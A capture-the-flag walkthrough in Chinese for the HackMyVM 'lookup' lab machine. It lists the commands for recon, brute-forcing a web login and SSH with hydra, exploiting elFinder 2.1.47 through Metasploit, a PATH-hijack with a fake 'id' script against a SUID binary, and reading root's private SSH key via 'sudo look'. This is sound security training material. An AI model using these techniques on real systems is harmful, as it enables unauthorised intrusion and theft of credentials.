hackmyvm-lookup
arp-scan -l
nmap -sS -v 192.168.222.209
gobuster dir -u http://192.168.222.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404
发现了一处dns解析,在/etc/hosts中添加
192.168.222.209 lookup.hmv
发现可以访问,是一处登录框
gobuster dir -u http://lookup.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404
漏洞发现
whatweb http://lookup.hmv
抓包,爆破
得到:username=jose&password=password123
跳转到http://files.lookup.hmv/,在hosts中添加这个域名
是一个elfinder 管理器
得到版本信息v2.1.47
msfconsole
set RHOSTS files.lookup.hmv
运行,进入shell环境(shell -t)
搜索具备SUID权限的程序
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -user root -perm -4000 -print 2>/dev/null
我们需要关注/usr/sbin/pwm,它正试图执行id命令来提取用户名和用户id。出现问题是因为它找不到.passwords文件,因为它位于“think”用户的主目录中,并且路径不同。
/usr/bin/script -qc /bin/bash /dev/null:启动一个新的 Bash shell
#!/bin/bash
echo "uid=33(think) gid=33(think) groups=33(think)"
开启http服务将id文件传进去
伪造id
PATH=/tmp:$PATH
chmod +x id
运行/usr/sbin/pwm
可以看到我们已经拿到/home/think/.password的内容
将跑出来的内容保存到本地pass.txt
hydra -l think -P pass.txt ssh://192.168.222.209 -V -I
ssh think@192.168.222.209
登录成功
sudo -l
sudo look '' /root/.ssh/id_rsa
将私钥完整粘贴到本地文件id中
使用 chmod 命令将私钥文件的权限设置为 600:
chmod 600 id
验证权限是否已更改:
ls -l id
连接root用户的ssh
ssh root@192.168.222.209 -i id
